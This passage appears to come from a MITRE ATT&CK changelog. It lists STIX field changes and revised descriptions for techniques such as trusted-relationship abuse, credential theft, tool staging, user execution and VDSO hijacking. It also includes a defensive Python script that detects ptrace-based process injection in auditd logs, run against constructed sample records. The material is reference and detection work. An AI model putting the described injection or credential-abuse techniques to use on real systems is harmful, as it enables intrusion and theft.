access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers) In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration) |
New Mitigations:
Dropped Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.045000+00:00 | 2022-10-21 14:35:00.274000+00:00 |
| description | Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers) | Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers) In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration) |
| x_mitre_data_sources[3] | Logon Session: Logon Session Creation | Network Traffic: Network Traffic Content |
| x_mitre_version | 2.2 | 2.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Office 365 Delegated Administration', 'description': 'Microsoft. (n.d.). Partners: Offer delegated administration. Retrieved May 27, 2022.', 'url': 'https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us'} | |
| x_mitre_contributors | ExtraHop | |
| x_mitre_contributors | Jannie Li, Microsoft Threat Intelligence Center (MSTIC) | |
| x_mitre_data_sources | Logon Session: Logon Session Creation | |
| x_mitre_platforms | Office 365 | |
| Description |
|---|
| Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-12 18:32:33.620000+00:00 | 2022-04-01 13:11:11.386000+00:00 |
| x_mitre_data_sources[0] | Command: Command Execution | Windows Registry: Windows Registry Key Access |
| x_mitre_data_sources[1] | File: File Access | Command: Command Execution |
| x_mitre_data_sources[2] | Process: Process Creation | User Account: User Account Authentication |
| x_mitre_data_sources[3] | User Account: User Account Authentication | Process: Process Creation |
| x_mitre_data_sources[4] | Windows Registry: Windows Registry Key Access | File: File Access |
| Old Description | New Description |
|---|---|
| Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo. Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool. | Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing) Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:25:37.072000+00:00 | 2022-10-20 20:16:32.599000+00:00 |
| description | Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo. Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool. | Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing) Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool. |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Malwarebytes Heroku Skimmers', 'description': "Jérôme Segura. (2019, December 4). There's an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022.", 'url': 'https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku'} | |
| external_references | {'source_name': 'Dragos Heroku Watering Hole', 'description': 'Kent Backman. (2021, May 18). When Intrusions Don’t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.', 'url': 'https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/'} | |
| external_references | {'source_name': 'Intezer App Service Phishing', 'description': 'Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.', 'url': 'https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/'} | |
| Description |
|---|
| Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA) Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:15:31.630000+00:00 | 2022-04-01 12:57:34.058000+00:00 |
| x_mitre_data_sources[0] | Logon Session: Logon Session Creation | Active Directory: Active Directory Credential Request |
| x_mitre_data_sources[1] | Web Credential: Web Credential Usage | User Account: User Account Authentication |
| x_mitre_data_sources[2] | Application Log: Application Log Content | Web Credential: Web Credential Usage |
| x_mitre_data_sources[3] | User Account: User Account Authentication | Logon Session: Logon Session Creation |
| x_mitre_data_sources[4] | Active Directory: Active Directory Credential Request | Application Log: Application Log Content |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | Containers | |
| Old Description | New Description |
|---|---|
| An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). | An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| x_mitre_remote_support | False | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-26 16:42:35.936000+00:00 | 2022-04-19 20:31:15.373000+00:00 |
| description | An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). | An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery) |
| x_mitre_data_sources[0] | Application Log: Application Log Content | Container: Container Creation |
| x_mitre_data_sources[1] | Instance: Instance Start | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[2] | Instance: Instance Creation | Container: Container Start |
| x_mitre_data_sources[3] | Image: Image Creation | Instance: Instance Creation |
| x_mitre_data_sources[4] | Command: Command Execution | Instance: Instance Start |
| x_mitre_data_sources[5] | Container: Container Start | Image: Image Creation |
| x_mitre_data_sources[6] | Container: Container Creation | Process: Process Creation |
| x_mitre_data_sources[7] | Network Traffic: Network Connection Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[8] | Network Traffic: Network Traffic Content | Command: Command Execution |
| x_mitre_data_sources[9] | File: File Creation | Application Log: Application Log Content |
| x_mitre_data_sources[10] | Process: Process Creation | File: File Creation |
| x_mitre_version | 1.4 | 1.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Telephone Attack Delivery', 'description': 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November 4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery. Retrieved January 5, 2022.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery'} |
| Old Description | New Description |
|---|---|
| Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. | Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:28:45.232000+00:00 | 2022-07-07 17:09:09.048000+00:00 |
| description | Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. | Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. |
| external_references[1]['source_name'] | ELF Injection May 2009 | Backtrace VDSO |
| external_references[1]['description'] | O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020. | backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020. |
| external_references[1]['url'] | https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html | https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/ |
| external_references[2]['source_name'] | Backtrace VDSO | Syscall 2014 |
| external_references[2]['description'] | backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020. | Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020. |
| external_references[2]['url'] | https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/ | https://lwn.net/Articles/604515/ |
| external_references[3]['source_name'] | VDSO Aug 2005 | GNU Acct |
| external_references[3]['description'] | Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020. | GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017. |
| external_references[3]['url'] | https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/ | https://www.gnu.org/software/acct/ |
| external_references[4]['source_name'] | Syscall 2014 | RHEL auditd |
| external_references[4]['description'] | Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020. | Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017. |
| external_references[4]['url'] | https://lwn.net/Articles/604515/ | https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing |
| external_references[6]['source_name'] | GNU Acct | ELF Injection May 2009 |
| external_references[6]['description'] | GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017. | O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020. |
| external_references[6]['url'] | https://www.gnu.org/software/acct/ | https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html |
| external_references[7]['source_name'] | RHEL auditd | VDSO Aug 2005 |
| external_references[7]['description'] | Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017. | Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020. |
| external_references[7]['url'] | https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing | https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/ |
| x_mitre_detection | Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. | Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)(Citation: GNU Acct)(Citation: RHEL auditd)(Citation: Chokepoint preload rootkits) Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. |
| x_mitre_version | 1.0 | 1.1 |
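The detection guidance in this entry (monitor ptrace and mmap, for which auditd is the cited Linux source) can be turned into a correlation rule. The Python below is an added example, not part of the ATT&CK record or of any cited source: it parses raw auditd SYSCALL records, pairs a tracer's PTRACE_ATTACH/PTRACE_SEIZE and its memory or register writes (POKETEXT, POKEDATA, SETREGS) with a later PROT_EXEC mmap or mprotect performed by the traced process, and leaves read-only debugger activity alone. The syscall numbers are x86_64 (arch=c000003e); the log lines, pids, paths and timestamps are constructed for the example.

```python
import re
from collections import defaultdict

# x86_64 syscall numbers (asm/unistd_64.h) and ptrace request codes (sys/ptrace.h).
# auditd reports the architecture of an x86_64 syscall as arch=c000003e.
SYS_MMAP, SYS_MPROTECT, SYS_PTRACE = 9, 10, 101
PTRACE_POKETEXT, PTRACE_POKEDATA, PTRACE_SETREGS = 4, 5, 13
PTRACE_ATTACH, PTRACE_SEIZE = 16, 0x4206
PROT_EXEC = 4
ARCH_X86_64 = 0xC000003E

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed raw auditd SYSCALL records (pids, paths and timestamps are invented):
#   pid 2001 attaches to 1234 (0x4d2), writes text and registers, resumes it; 1234 then maps RX memory
#   pid 3001 (a debugger) attaches to 3000 (0xbb8) but only reads registers
#   pid 4000 maps RW memory with nobody tracing it
SAMPLE = """\
type=SYSCALL msg=audit(1650000000.101:501): arch=c000003e syscall=101 success=yes exit=0 a0=10 a1=4d2 a2=0 a3=0 pid=2001 comm="inject" exe="/tmp/inject"
type=SYSCALL msg=audit(1650000000.102:502): arch=c000003e syscall=101 success=yes exit=0 a0=c a1=4d2 a2=0 a3=7ffd0000 pid=2001 comm="inject" exe="/tmp/inject"
type=SYSCALL msg=audit(1650000000.103:503): arch=c000003e syscall=101 success=yes exit=0 a0=4 a1=4d2 a2=7ffff7fd1000 a3=90909090 pid=2001 comm="inject" exe="/tmp/inject"
type=SYSCALL msg=audit(1650000000.104:504): arch=c000003e syscall=101 success=yes exit=0 a0=d a1=4d2 a2=0 a3=7ffd0000 pid=2001 comm="inject" exe="/tmp/inject"
type=SYSCALL msg=audit(1650000000.105:505): arch=c000003e syscall=101 success=yes exit=0 a0=7 a1=4d2 a2=0 a3=0 pid=2001 comm="inject" exe="/tmp/inject"
type=SYSCALL msg=audit(1650000000.120:506): arch=c000003e syscall=9 success=yes exit=140737353900032 a0=0 a1=1000 a2=5 a3=22 pid=1234 comm="sshd" exe="/usr/sbin/sshd"
type=SYSCALL msg=audit(1650000000.200:507): arch=c000003e syscall=101 success=yes exit=0 a0=10 a1=bb8 a2=0 a3=0 pid=3001 comm="gdb" exe="/usr/bin/gdb"
type=SYSCALL msg=audit(1650000000.201:508): arch=c000003e syscall=101 success=yes exit=0 a0=c a1=bb8 a2=0 a3=7ffd1000 pid=3001 comm="gdb" exe="/usr/bin/gdb"
type=SYSCALL msg=audit(1650000000.300:509): arch=c000003e syscall=9 success=yes exit=140737353904128 a0=0 a1=2000 a2=3 a3=22 pid=4000 comm="python3" exe="/usr/bin/python3"
"""


def parse_syscall_record(line):
    """Parse one raw 'type=SYSCALL' auditd record into a dict; any other record type -> None.
    auditd writes arch and the a0..a3 arguments as bare hex, syscall and pid as decimal."""
    if not line.startswith("type=SYSCALL"):
        return None
    rec = {k: v.strip('"') for k, v in FIELD_RE.findall(line)}
    rec["ts"] = float(re.search(r"audit\((\d+\.\d+):", line).group(1))
    for k in ("arch", "a0", "a1", "a2", "a3"):
        rec[k] = int(rec[k], 16)
    for k in ("syscall", "pid"):
        rec[k] = int(rec[k])
    return rec


def find_injection_chains(lines):
    """Return (injector_pid, target_pid, sorted ptrace write requests) for every tracer that
    attached to a process, wrote into its memory or registers, after which the target created
    executable memory. Tracers that only read (GETREGS, PEEK*) never appear in the result."""
    recs = [r for r in map(parse_syscall_record, lines)
            if r and r["arch"] == ARCH_X86_64 and r["success"] == "yes"]
    attach_ts = {}                 # (injector, target) -> time of first ATTACH/SEIZE
    writes = defaultdict(set)      # (injector, target) -> ptrace write requests observed
    exec_maps = defaultdict(list)  # pid -> times it created PROT_EXEC memory
    for r in sorted(recs, key=lambda r: r["ts"]):
        if r["syscall"] == SYS_PTRACE:
            key = (r["pid"], r["a1"])          # ptrace(request=a0, pid=a1, addr=a2, data=a3)
            if r["a0"] in (PTRACE_ATTACH, PTRACE_SEIZE):
                attach_ts.setdefault(key, r["ts"])
            elif r["a0"] in (PTRACE_POKETEXT, PTRACE_POKEDATA, PTRACE_SETREGS):
                writes[key].add(r["a0"])
        elif r["syscall"] in (SYS_MMAP, SYS_MPROTECT) and r["a2"] & PROT_EXEC:
            exec_maps[r["pid"]].append(r["ts"])  # mmap/mprotect(addr=a0, len=a1, prot=a2)
    findings = []
    for (injector, target), t0 in sorted(attach_ts.items()):
        w = writes.get((injector, target), set())
        if w and any(t >= t0 for t in exec_maps.get(target, [])):
            findings.append((injector, target, sorted(w)))
    return findings


if __name__ == "__main__":
    for injector, target, reqs in find_injection_chains(SAMPLE.splitlines()):
        print(f"pid {injector} traced pid {target}, ptrace writes {reqs}, "
              f"target then mapped PROT_EXEC memory")
```

The debugger in the sample attaches and reads registers but writes nothing, so it is not reported; the injector writes into its target and the target then maps readable-executable memory, which is the chain the ATT&CK text describes (the target performs the mmap itself via hijacked vdso stubs, so the mmap is attributed to the victim pid, not the injector). On a live host the same parser can be fed the output of `ausearch -m SYSCALL --raw`, assuming audit rules that record ptrace, mmap and mprotect on exit have been loaded.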
| Old Description | New Description |
|---|---|
| Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the 